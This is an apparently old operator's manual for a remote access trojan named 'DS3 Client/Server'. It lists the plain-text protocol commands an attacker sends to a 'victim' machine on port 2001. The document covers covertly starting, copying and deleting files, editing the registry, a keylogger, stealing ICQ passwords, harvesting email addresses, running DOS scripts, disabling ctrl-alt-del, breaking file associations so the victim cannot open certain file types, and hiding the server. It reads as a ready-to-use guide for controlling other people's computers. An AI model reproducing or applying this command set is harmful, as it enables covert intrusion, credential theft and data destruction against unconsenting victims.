This Text was written by: PhilippP Commands: DS3 Client/Server After a [OUT] command you must wait for an [IN] command! File Up/Download, Screenshoot, Chat, Offline Keylogger, Port Redirect are not available! IP = Port = 2001 (Standart Port) COMMANDS: [OUT] = the commands you must send! [IN] = the commands you get from the server! TO CONNECT TO VICTIM: ************************************ Ok, now connect to the IP and Port (2001). You are now connected, but you are not able to use functions because a Passwort is required! [OUT] PasswortAbfrage [IN] PassJetzt [OUT] 'Passwort' or [OUT] KeinPasswort (if there is no password!) [IN] PasswortOK (Passwort is OK, ready to use the functions) [IN] PasswortNichtOK (Passwort is NOT OK, type another) ************************************ HERE ARE THE FUNCTIONS: ************************************ FILEMANAGER: First you must type: [OUT] DateiManager [IN] 'getdrives' then you are able to use the other functions of the filemanager. getdrives = [OUT] DateiManager show file = [OUT] DAnzeigen [IN] DAnzeigen [OUT] 'FilePath' copy file = [OUT] KopieDatei [IN] KopieOK [OUT] 'Path of the file wich you will copy' [IN] KopieDatei1 [OUT] 'Path of the new file' [IN] DateiKopieOK (file coped) kill file = [OUT] DLoeschen [IN] DLoeschen [OUT] 'Path of the file' [IN] DateiLoeschen (file is now killed) rename file= [OUT] RenDatei [IN] RenOK [OUT] 'Path of the file' [IN] [OUT] 'Path of the "new" file' Path! not only the filename c:\a.bat --> c:\b.bat not b.bat! [IN] DateiRenOK (file has been renamed) file typ = [OUT] DateiTyp [IN] DateiTyp [OUT] 'file typ' [IN] DateiTypOk (new file typ has been set) (type) path= [OUT] VerzOKK [IN] VVV [OUT] 'Path' [IN] 'Lists directory and files' start file = [OUT] DStartenU = Invisible [OUT] DSTarten = visible [IN] DStarten [OUT] 'path of file' (*.exe, *.com, *.bat) [In] DateiStarten (file started) ************************************ REGISTRY: Registry: GET Note: abbb = HKEY_LOCAL_MACHINE bbbb = HKEY_CURRENT_USER cbbb = HKEY_USERS dbbb = HKEY_CLASSES_ROOT ebbb = HKEY_DYN_DATA fbbb = HKEY_CURRENT_CONFIG [OUT] Registrierung [IN] Reg1 [OUT] abbbSOFTWARE\Microsoft\Windows\CurrentVersion (NOT: abbbSOFTWARE\Microsoft\Windows\CurrentVersion\) [IN] Reg2 [OUT] 'value' (examble: Version) Registry: SET [OUT] RegSetzen [IN] RegSuper [OUT] abbbSOFTWARE\Microsoft\Windows\CurrentVersion (NOT: abbbSOFTWARE\Microsoft\Windows\CurrentVersion\) [IN] RegSuper2 [OUT] 'value' (examble: Version) [IN] RegSuper3 [OUT] 'data' [IN] RegSS (Reg has been Set) ************************************ WINDOWS: Current User = [OUT] WelcherUser minimize all = [OUT] AllesMinimieren [IN] AllesMinimieren (yeah) maximize all = [OUT] AllesMaximieren [IN] AllesMaximieren (yeah) scale down all = [OUT] AllesVerkleinern [IN] AllesVerkleinern (yeah) close all = [OUT] AllesBeenden [IN] ----------------------------------NOCH NICHT!-------------------------- ************************************ SHOW WINDOWS: 'shut down window' = [OUT] EWinBeenden [IN] EWinBeenden (yeah) 'clock setting' = [OUT] EUhr [IN] EUhr (yeah) 'taskbar setting' = [OUT] ETaskleiste [IN] ETaskleiste (yeah) 'find' = [OUT] ESuchen [IN] ESuchen (yeah) 'start' = [OUT] EAus [IN] EAus (yeah) ************************************ WINDOW MANAGER: show all windows = [OUT] AlleFensterErmitteln close window = [OUT] WindowsEnde'window name' (examble: WindowsEndeSendOnlineMessage) [IN] FensterZU (window has been closed) bring to top = [OUT] 'window name' (only type the window name) [IN] FensterTop (window is top now) hide window = [OUT] FensterHide'window name' (examble: FensterHideSendOnlineMessage) [IN] FensterHide (window is now hidden) maximize window = [OUT] FensterMax'window name' (examble: FensterMaxSendOnlineMessage) [IN] FensterMax (window is now maximized) minimize window = [OUT] FensterMin'window name' (examble: FensterMinSendOnlineMessage) [IN] FensterMin (window is now minimized) refresh window = [OUT] AlleFensterErmitteln ************************************ COOL STUFF: shut down computer = [OUT] ComputerAusschalten restart computer = [OUT] ComputerNeuStarten shut down windows = [OUT] WindowsAbmelden shut down screen = [OUT] BildschirmAbsturz tile windows = [OUT] ZweiSpalten [IN] ZweiSpalten (windows has been tiled) clear clipboard = [OUT] ZwischenLeeren [IN] ZwischeLeer (clipboard is cleared) ************************************ MOUSE: Set Cursor = [OUT] MausBewegen [IN] MausBewegenOK (Cursor has been set) swap buttons = [OUT] MausVertauschen [IN] MausVertauschen (buttons swaped) restore buttons = [OUT] MausRichtig [IN] MausRichtig (buttons restored) ************************************ PLAY SOUNDS: to activate playing sound: [OUT] SoundAbSpielen [IN] SoundAbSpielen system question = [OUT] a [IN] SoundWurdeAbGespielt (Sound has been played) system exclamation = [OUT] b [IN] SoundWurdeAbGespielt (Sound has been played) system asteriks = [OUT] c [IN] SoundWurdeAbGespielt (Sound has been played) system hand = [OUT] d [IN] SoundWurdeAbGespielt (Sound has been played) system default = [OUT] e [IN] SoundWurdeAbGespielt (Sound has been played) ************************************ PING PONG VIRUS: on: [OUT] PingPongan [IN] PingPongan (on) off: [OUT] PingPongaus [IN] PingPongan (off) ************************************ MSGMANAGER: to activate the Msg-Manager: [OUT] MSG [IN] (There is no server command, please wait 1-2 sec. and then put the commands) msg typ: (there are no server command too [IN] ) (standart is ok) ok = [OUT] vbOK error = [OUT] vbKritisch info = [OUT] vbInfo send message = [OUT] = 'text' [IN] Msgboxx (message has been send) ************************************ SEND KEYS: send key = [Out] SendKey [In] SendKeyJetzt [Out] 'key' [In] SendKeyOK (key has been send) ************************************ KEY LOGGER: on = [OUT] KeySpy off = [OUT] KeySpyAus [IN] KeySpyAus (Key Logger is now off) ************************************ SYSTEN INFOS: [OUT] SysInfo ************************************ MS-DOS SCRIBT: [OUT] msdosskribt [IN] no server command (wait 1-2 sec then send the next commands) [OUT] 'scribt' [IN] msdosOK (MS-DOS scribt has been send) ************************************ APP REDIRECT: [OUT] AppRedirect'Path of the Dos File' (examble: AppRedirectc:\windows\netstat -a) ************************************ XTRAS: open CD-ROM = [OUT] CDOpen [IN] CDauf (cd rom is open) close CD-ROM = [OUT] CDClose [IN] CDzu (cd rom is closed) ctrl-alt-del on = [OUT] STRGan [IN] STRGan (yeah) ctrl-alt-del off = [OUT] STRGaus [IN] STRGaus (yeah) hide taskbar = [OUT] TaskleisteFalse [IN] TaskFalse (yeah) show taskbar = [OUT] TaskleisteTrue [IN] TaskTrue (yeah) freeze screen = [OUT] DesktopEinfrieren [IN] DesktopEinfrierenOK (yeah) get time = [OUT] ZeitAbr get date = [OUT] DatumAbr set time = [OUT] ZeitV [IN] ZeitOKNUN [OUT] 'new time' [IN] Zeitt (time has been set) set date [OUT] DatumV [IN] DatumOKNUN [OUT] 'new date' [IN] Datumm (date has been set) ************************************ FLIP SCREEN: horizontaly = [OUT] zickzack (yes zickzack zickzack = horizontaly and not the zickzack function!!! ;)) [IN] DesktopDrehenOK (yeah) verticaly = [OUT] achtnull [IN] DesktopDrehenOK (yeah) zickzack = [OUT] neunnull [IN] DesktopDrehenOK (yeah) ************************************ CHANGE RESOLUTION: 640 x 480 = [OUT] SechsHundert [IN] AuflG (resolution has been changed) 800 x 600 = [OUT] AchtHundert [IN] AuflG (resolution has been changed) 1024 x 768 = [OUT] Tausend [IN] AuflG (resolution has been changed) 1280 x 1024 = [OUT] TausendZwei [IN] AuflG (resolution has been changed) 1600 x 1200 = [OUT] TausendSechs [IN] AuflG (resolution has been changed) ************************************ VISUAL ACOUSTIC: show picture = [OUT] BildAnzeigenJetzt [IN] BildAnzeigenJetzt [OUT] 'Path' [IN] ABild (picture has been showed) play sound = [OUT] SoundAbspielenJetzt [IN] SoundAbspielenJetzt [OUT] 'Path' [IN] GSound (sound has been played) beep = [OUT] Beep [IN] Beep (beep) show text on screen = [OUT] TextAmDesktop [IN] TextAmDesktop [OUT] 'text' [IN] TextAmDesktopOK (yeah) ************************************ INTERNET: Start URL = [OUT] URL [IN] URL [OUT] 'URL' [IN] URLOK (yeah) find emails = [OUT] EmailsFinden netstat = [OUT] AppRedirect2 ************************************ ICQ: steal ICQ Password = [OUT] ICQP find out ICQ UIN number = [OUT] ICQU find out ICQ nickname = [OUT] ICQN close ICQ = [OUT] ICQC [IN] FensterZU (ICQ has been closed) get online list = [OUT] ICQO get group = [OUT] ICQG get full owner = [OUT] ICQF show data of spec. UIN = [OUT] ICQS'UIN' (examble: ICQS123456789) send message with victims UIN = [OUT] ICQM'UIN' (examble: ICQM123456789) [IN] ICQM1 [OUT] 'text' [IN] ICQMOK (Message has been send) ************************************ DESTROY *.XXX: [OUT] RegDest'filetyp' (examble: RegDestBMP) [IN] RegDestroyed (*.xxx has been destroyed and the victim is not able to start this file-typ ;)) ************************************ SERVER OPTIONS: invisible = [OUT] ServerUnsichtbar visible = [OUT] ServerSichtbar change password = [OUT] Passwortaendern = [IN] Passwortaendern = [OUT] 'new password' = [IN] Passwortgeaendert (Password changed) close server = [OUT] ServerSchliessen remove server = [OUT] ServerEntfernen ************************************ visit my HP: ************************************